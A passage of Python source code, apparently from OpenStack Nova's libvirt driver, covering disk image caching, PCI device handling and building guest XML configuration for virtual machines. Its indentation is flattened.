if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * units.Gi
if size == 0 or suffix == '.rescue':
size = None
backend = image('disk')
if backend.SUPPORTS_CLONE:
def clone_fallback_to_fetch(*args, **kwargs):
try:
backend.clone(context, disk_images['image_id'])
except exception.ImageUnacceptable:
libvirt_utils.fetch_image(*args, **kwargs)
fetch_func = clone_fallback_to_fetch
else:
fetch_func = libvirt_utils.fetch_image
backend.cache(fetch_func=fetch_func,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = disk.get_fs_type_for_os_type(
instance['os_type'])
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
disk_image = image('disk.local')
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * units.Gi
disk_image.cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for idx, eph in enumerate(driver.block_device_info_get_ephemerals(
block_device_info)):
disk_image = image(blockinfo.get_eph_disk(idx))
specified_fs = eph.get('guest_format')
if specified_fs and not self.is_supported_fs_format(specified_fs):
msg = _("%s format is not supported") % specified_fs
raise exception.InvalidBDMFormat(details=msg)
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % idx,
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
size = eph['size'] * units.Gi
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
disk_image.cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'],
specified_fs=specified_fs)
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * units.Mi
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_LI('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = self._get_disk_config_path(instance, suffix)
LOG.info(_LI('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection only if needed
elif inject_files and CONF.libvirt.inject_partition != -2:
if booted_from_volume:
LOG.warn(_LW('File injection into a boot from volume '
'instance is not supported'), instance=instance)
self._inject_data(
instance, network_info, admin_pass, files, suffix)
if CONF.libvirt.virt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def _prepare_pci_devices_for_use(self, pci_devices):
# kvm , qemu support managed mode
# In managed mode, the configured device will be automatically
# detached from the host OS drivers when the guest is started,
# and then re-attached when the guest shuts down.
if CONF.libvirt.virt_type != 'xen':
# we do manual detach only for xen
return
try:
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
# Note(yjiang5) Spelling for 'dettach' is correct, see
# http://libvirt.org/html/libvirt-libvirt.html.
libvirt_dev.dettach()
# Note(yjiang5): A reset of one PCI device may impact other
# devices on the same bus, thus we need two separated loops
# to detach and then reset it.
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
libvirt_dev.reset()
except libvirt.libvirtError as exc:
raise exception.PciDevicePrepareFailed(id=dev['id'],
instance_uuid=
dev['instance_uuid'],
reason=str(exc))
def _detach_pci_devices(self, dom, pci_devs):
# for libvirt version < 1.1.1, this is race condition
# so forbid detach if not had this version
if not self._has_min_version(MIN_LIBVIRT_DEVICE_CALLBACK_VERSION):
if pci_devs:
reason = (_("Detaching PCI devices with libvirt < %(ver)s"
" is not permitted") %
{'ver': MIN_LIBVIRT_DEVICE_CALLBACK_VERSION})
raise exception.PciDeviceDetachFailed(reason=reason,
dev=pci_devs)
try:
for dev in pci_devs:
dom.detachDeviceFlags(self._get_guest_pci_device(dev).to_xml(),
libvirt.VIR_DOMAIN_AFFECT_LIVE)
# after detachDeviceFlags returned, we should check the dom to
# ensure the detaching is finished
xml = dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
guest_config = vconfig.LibvirtConfigGuest()
guest_config.parse_dom(xml_doc)
for hdev in [d for d in guest_config.devices
if isinstance(d, vconfig.LibvirtConfigGuestHostdevPCI)]:
hdbsf = [hdev.domain, hdev.bus, hdev.slot, hdev.function]
dbsf = pci_utils.parse_address(dev['address'])
if [int(x, 16) for x in hdbsf] ==\
[int(x, 16) for x in dbsf]:
raise exception.PciDeviceDetachFailed(reason=
"timeout",
dev=dev)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("Instance disappeared while detaching "
"a PCI device from it."))
else:
raise
def _attach_pci_devices(self, dom, pci_devs):
try:
for dev in pci_devs:
dom.attachDevice(self._get_guest_pci_device(dev).to_xml())
except libvirt.libvirtError:
LOG.error(_LE('Attaching PCI devices %(dev)s to %(dom)s failed.'),
{'dev': pci_devs, 'dom': dom.ID()})
raise
def _set_host_enabled(self, enabled,
disable_reason=DISABLE_REASON_UNDEFINED):
"""Enables / Disables the compute service on this host.
This doesn't override non-automatic disablement with an automatic
setting; thereby permitting operators to keep otherwise
healthy hosts out of rotation.
"""
status_name = {True: 'disabled',
False: 'enabled'}
disable_service = not enabled
ctx = nova_context.get_admin_context()
try:
service = objects.Service.get_by_compute_host(ctx, CONF.host)
if service.disabled != disable_service:
# Note(jang): this is a quick fix to stop operator-
# disabled compute hosts from re-enabling themselves
# automatically. We prefix any automatic reason code
# with a fixed string. We only re-enable a host
# automatically if we find that string in place.
# This should probably be replaced with a separate flag.
if not service.disabled or (
service.disabled_reason and
service.disabled_reason.startswith(DISABLE_PREFIX)):
service.disabled = disable_service
service.disabled_reason = (
DISABLE_PREFIX + disable_reason
if disable_service else DISABLE_REASON_UNDEFINED)
service.save()
LOG.debug('Updating compute service status to %s',
status_name[disable_service])
else:
LOG.debug('Not overriding manual compute service '
'status with: %s',
status_name[disable_service])
except exception.ComputeHostNotFound:
LOG.warn(_LW('Cannot update service status on host: %s,'
'since it is not registered.'), CONF.host)
except Exception:
LOG.warn(_LW('Cannot update service status on host: %s,'
'due to an unexpected exception.'), CONF.host,
exc_info=True)
def _get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self._conn.baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
else:
raise
return self._caps
def _get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self._get_host_capabilities()
return caps.host.uuid
def _get_guest_cpu_model_config(self):
mode = CONF.libvirt.cpu_mode
model = CONF.libvirt.cpu_model
if (CONF.libvirt.virt_type == "kvm" or
CONF.libvirt.virt_type == "qemu"):
if mode is None:
mode = "host-model"
if mode == "none":
return vconfig.LibvirtConfigGuestCPU()
else:
if mode is None or mode == "none":
return None
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt.virt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug("CPU mode '%(mode)s' model '%(model)s' was chosen",
{'mode': mode, 'model': (model or "")})
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
return cpu
def _get_guest_cpu_config(self, flavor, image):
cpu = self._get_guest_cpu_model_config()
if cpu is None:
return None
topology = hardware.VirtCPUTopology.get_best_config(flavor,
image)
cpu.sockets = topology.sockets
cpu.cores = topology.cores
cpu.threads = topology.threads
return cpu
def _get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self._get_hypervisor_version())
def _get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt.virt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self._get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self._get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
instance.default_ephemeral_device = (
block_device.prepend_dev(disklocal.target_dev))
instance.save()
for idx, eph in enumerate(
driver.block_device_info_get_ephemerals(
block_device_info)):
diskeph = self._get_guest_disk_config(
instance,
blockinfo.get_eph_disk(idx),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self._get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
instance.default_swap_device = (
block_device.prepend_dev(diskswap.target_dev))
instance.save()
for vol in block_device_mapping:
connection_info = vol['connection_info']
vol_dev = block_device.prepend_dev(vol['mount_device'])
info = disk_mapping[vol_dev]
cfg = self._connect_volume(connection_info, info)
devices.append(cfg)
vol['connection_info'] = connection_info
vol.save()
if 'disk.config' in disk_mapping:
diskconfig = self._get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self._set_cache_mode(d)
if (image_meta and
image_meta.get('properties', {}).get('hw_scsi_model')):
hw_scsi_model = image_meta['properties']['hw_scsi_model']
scsi_controller = vconfig.LibvirtConfigGuestController()
scsi_controller.type = 'scsi'
scsi_controller.model = hw_scsi_model
devices.append(scsi_controller)
return devices
def _get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self._get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def _get_guest_pci_device(self, pci_device):
dbsf = pci_utils.parse_address(pci_device['address'])
dev = vconfig.LibvirtConfigGuestHostdevPCI()
dev.domain, dev.bus, dev.slot, dev.function = dbsf
# only kvm support managed mode
if CONF.libvirt.virt_type in ('xen',):
dev.managed = 'no'
if CONF.libvirt.virt_type in ('kvm', 'qemu'):
dev.managed = 'yes'
return dev
def _get_guest_config_meta(self, context, instance, flavor):
"""Get metadata config for guest."""
meta = vconfig.LibvirtConfigGuestMetaNovaInstance()
meta.package = version.version_string_with_package()
meta.name = instance["display_name"]
meta.creationTime = time.time()
if instance["image_ref"] not in ("", None):
meta.roottype = "image"
meta.rootid = instance["image_ref"]
if context is not None:
ometa = vconfig.LibvirtConfigGuestMetaNovaOwner()
ometa.userid = context.user_id
ometa.username = context.user_name
ometa.projectid = context.project_id
ometa.projectname = context.project_name
meta.owner = ometa
fmeta = vconfig.LibvirtConfigGuestMetaNovaFlavor()
fmeta.name = flavor.name
fmeta.memory = flavor.memory_mb
fmeta.vcpus = flavor.vcpus
fmeta.ephemeral = flavor.ephemeral_gb
fmeta.disk = flavor.root_gb
fmeta.swap = flavor.swap
meta.flavor = fmeta
return meta
def _get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None,
context=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
img_meta_prop = image_meta.get('properties', {}) if image_meta else {}
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt.virt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
# We are using default unit for memory: KiB
guest.memory = flavor.memory_mb * units.Ki
guest.vcpus = flavor.vcpus
guest.cpuset = hardware.get_vcpu_pin_set()
guest.metadata.append(self._get_guest_config_meta(context,
instance,
flavor))
cputuning = ['shares', 'period', 'quota']
for name in cputuning:
key = "quota:cpu_" + name
if key in flavor.extra_specs:
if guest.cputune is None:
guest.cputune = vconfig.LibvirtConfigGuestCPUTune()
setattr(guest.cputune, name,
int(flavor.extra_specs[key]))
guest.cpu = self._get_guest_cpu_config(flavor, image_meta)
if 'root' in disk_mapping:
root_device_name = block_device.prepend_dev(
disk_mapping['root']['dev'])
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
instance.root_device_name = root_device_name
instance.save()
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt.virt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt.virt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt.virt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt.virt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.libvirt.xen_hvmloader_path
if CONF.libvirt.virt_type in ("kvm", "qemu"):
caps = self._get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self._get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
# The underlying machine type can be set as an image attribute,
# or otherwise based on some architecture specific defaults
if (image_meta is not None and image_meta.get('properties') and
image_meta['properties'].get('hw_machine_type')
is not None):
guest.os_mach_type = \
image_meta['properties']['hw_machine_type']
else:
# For ARM systems we will default to vexpress-a15 for armv7
# and virt for aarch64
if caps.host.cpu.arch == "armv7l":
guest.os_mach_type = "vexpress-a15"
if caps.host.cpu.arch == "aarch64":
guest.os_mach_type = "virt"
if CONF.libvirt.virt_type == "lxc":
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt.virt_type == "uml":
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
# we only support os_command_line with images with an explicit
# kernel set and don't want to break nova if there's an
# os_command_line property without a specified kernel_id param
if image_meta:
img_props = image_meta.get('properties', {})
if img_props.get('os_command_line'):
guest.os_cmdline = img_props.get('os_command_line')
else:
guest.os_boot_dev = blockinfo.get_boot_order(disk_info)
if ((CONF.libvirt.virt_type != "lxc" and
CONF.libvirt.virt_type != "uml")):
guest.acpi = True
guest.apic = True
# NOTE(mikal): Microsoft Windows expects the clock to be in
# "localtime". If the clock is set to UTC, then you can use a
# registry key to let windows know, but Microsoft says this is
# buggy in http://support.microsoft.com/kb/2687252
clk = vconfig.LibvirtConfigGuestClock()
if instance['os_type'] == 'windows':
LOG.info(_LI('Configuring timezone for windows instance to '
'localtime'), instance=instance)
clk.offset = 'localtime'
else:
clk.offset = 'utc'
guest.set_clock(clk)
if CONF.libvirt.virt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
arch = libvirt_utils.get_arch(image_meta)
if arch in ("i686", "x86_64"):
# NOTE(rfolco): HPET is a hardware timer for x86 arch.
# qemu -no-hpet is not supported on non-x86 targets.
tmhpet = vconfig.LibvirtConfigGuestTimer()
tmhpet.name = "hpet"
tmhpet.present = False
clk.add_timer(tmhpet)
for config in self._get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
flavor):
guest.add_device(config)
for vif in network_info:
config = self.vif_driver.get_config(
instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
guest.add_device(config)
if ((CONF.libvirt.virt_type == "qemu" or
CONF.libvirt.virt_type == "kvm")):
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
add_video_driver = False
if ((CONF.vnc_enabled and
CONF.libvirt.virt_type not in ('lxc', 'uml'))):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
add_video_driver = True
if CONF.spice.enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
add_video_driver = True
if add_video_driver:
VALID_VIDEO_DEVICES = ("vga", "cirrus", "vmvga", "xen", "qxl")
video = vconfig.LibvirtConfigGuestVideo()
# NOTE(ldbragst): The following logic sets the video.type
# depending on supported defaults given the architecture,
# virtualization type, and features. The video.type attribute can
# be overridden by the user with image_meta['properties'], which
# is carried out in the next if statement below this one.
arch = libvirt_utils.get_arch(image_meta)
if guest.os_type == vm_mode.XEN:
video.type = 'xen'
elif arch in ('ppc', 'ppc64'):
# NOTE(ldbragst): PowerKVM doesn't support 'cirrus' be default
# so use 'vga' instead when running on Power hardware.
video.type = 'vga'
elif CONF.spice.enabled:
video.type = 'qxl'
if img_meta_prop.get('hw_video_model'):
video.type = img_meta_prop.get('hw_video_model')
if (video.type not in VALID_VIDEO_DEVICES):
raise exception.InvalidVideoMode(model=video.type)
# Set video memory, only if the flavor's limit is set
video_ram = int(img_meta_prop.get('hw_video_ram', 0))
max_vram = int(flavor.extra_specs
.get('hw_video:ram_max_mb', 0))
if video_ram > max_vram:
raise exception.RequestedVRamTooHigh(req_vram=video_ram,
max_vram=max_vram)
if max_vram and video_ram:
video.vram = video_ram
guest.add_device(video)
# Qemu guest agent only support 'qemu' and 'kvm' hypervisor
if CONF.libvirt.virt_type in ('qemu', 'kvm'):
qga_enabled = False
# Enable qga only if the 'hw_qemu_guest_agent' is equal to yes
hw_qga = img_meta_prop.get('hw_qemu_guest_agent', 'no')
if hw_qga.lower() == 'yes':
LOG.debug("Qemu guest agent is enabled through image "
"metadata", instance=instance)
qga_enabled = True
if qga_enabled:
qga = vconfig.LibvirtConfigGuestChannel()
qga.type = "unix"
qga.target_name = "org.qemu.guest_agent.0"
qga.source_path = ("/var/lib/libvirt/qemu/%s.%s.sock" %
("org.qemu.guest_agent.0", instance['name']))
guest.add_device(qga)
if (img_meta_prop.get('hw_rng_model') == 'virtio' and
flavor.extra_specs.get('hw_rng:allowed',
'').lower() == 'true'):
rng_device = vconfig.LibvirtConfigGuestRng()
rate_bytes = flavor.extra_specs.get('hw_rng:rate_bytes', 0)
period = flavor.extra_specs.get('hw_rng:rate_period', 0)
if rate_bytes:
rng_device.rate_bytes = int(rate_bytes)
rng_device.rate_period = int(period)
if (CONF.libvirt.rng_dev_path and
not os.path.exists(CONF.libvirt.rng_dev_path)):
raise exception.RngDeviceNotExist(
path=CONF.libvirt.rng_dev_path)
rng_device.backend = CONF.libvirt.rng_dev_path
guest.add_device(rng_device)
if CONF.libvirt.virt_type in ('xen', 'qemu', 'kvm'):
for pci_dev in pci_manager.get_instance_pci_devs(instance):
guest.add_device(self._get_guest_pci_device(pci_dev))
else:
if len(pci_manager.get_instance_pci_devs(instance)) > 0:
raise exception.PciDeviceUnsupportedHypervisor(
type=CONF.libvirt.virt_type)
watchdog_action = flavor.extra_specs.get('hw_watchdog_action',
'disabled')
if (image_meta is not None and
image_meta.get('properties', {}).get('hw_watchdog_action')):
watchdog_action = image_meta['properties']['hw_watchdog_action']
# NB(sross): currently only actually supported by KVM/QEmu
if watchdog_action != 'disabled':
if watchdog_actions.is_valid_watchdog_action(watchdog_action):
bark = vconfig.LibvirtConfigGuestWatchdog()
bark.action = watchdog_action
guest.add_device(bark)
else:
raise exception.InvalidWatchdogAction(action=watchdog_action)
return guest
def _get_guest_xml(self, context, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
if image_meta is None:
image_ref = instance['image_ref']
image_meta = compute_utils.get_image_metadata(
context, self._image_api, image_ref, instance)
# NOTE(danms): Stringifying a NetworkInfo will take a lock. Do
# this ahead of time so that we don't acquire it while also
# holding the logging lock.
network_info_str = str(network_info)
msg = ('Start _get_guest_xml '
'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
'image_meta=%(image_meta)s rescue=%(rescue)s '
'block_device_info=%(block_device_info)s' %
{'network_info': network_info_str, 'disk_info': disk_info,
'image_meta': image_meta, 'rescue': rescue,
'block_device_info': block_device_info})
# NOTE(mriedem): block_device_info can contain auth_password so we
# need to sanitize the password in the message.
LOG.debug(logging.mask_password(msg), instance=instance)
conf = self._get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info,
context)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug('End _get_guest_xml xml=%(xml)s',
{'xml': xml}, instance=instance)
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
dom_info = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[dom_info[0]],
'max_mem': dom_info[1],
'mem': dom_info[2],
'num_cpu': dom_info[3],
'cpu_time': dom_info[4],
'id': virt_dom.ID()}
def _create_domain_setup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
rootfs_dev = disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
try:
# Save rootfs device to disconnect it when deleting the instance
if rootfs_dev:
instance.system_metadata['rootfs_device_name'] = rootfs_dev
instance.save()
except Exception:
with excutils.save_and_reraise_exception():
self._create_domain_cleanup_lxc(instance)
def _create_domain_cleanup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
# The domain may not be present if the instance failed to start
state = None
if state == power_state.RUNNING:
# NOTE(uni): Now the container is running with its own private
# mount namespace and so there is no need to keep the container
# rootfs mounted in the host namespace
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
err = None
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_setup_lxc(instance)
try:
if xml:
err = _LE('Error defining a domain with XML: %s') % xml
domain = self._conn.defineXML(xml)
if power_on:
err = _LE('Error launching a defined domain with XML: %s') \
% domain.XMLDesc(0)
domain.createWithFlags(launch_flags)
if not utils.is_neutron():
err = _LE('Error enabling hairpin mode with XML: %s') \
% domain.XMLDesc(0)
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
if err:
LOG.error(err)
finally:
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_cleanup_lxc(instance)
return domain
def _neutron_failed_callback(self, event_name, instance):
LOG.error(_LE('Neutron Reported failure on event '
'%(event)s for instance %(uuid)s'),
{'event': event_name, 'uuid': instance.uuid})
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
def _get_neutron_events(self, network_info):
# NOTE(danms): We need to collect any VIFs that are currently
# down that we expect a down->up event for. Anything that is
# already up will not undergo that transition, and for
# anything that might be stale (cache-wise) assume it's
# already up so we don't block on it.
return [('network-vif-plugged', vif['id'])
for vif in network_info if vif.get('active', True) is False]
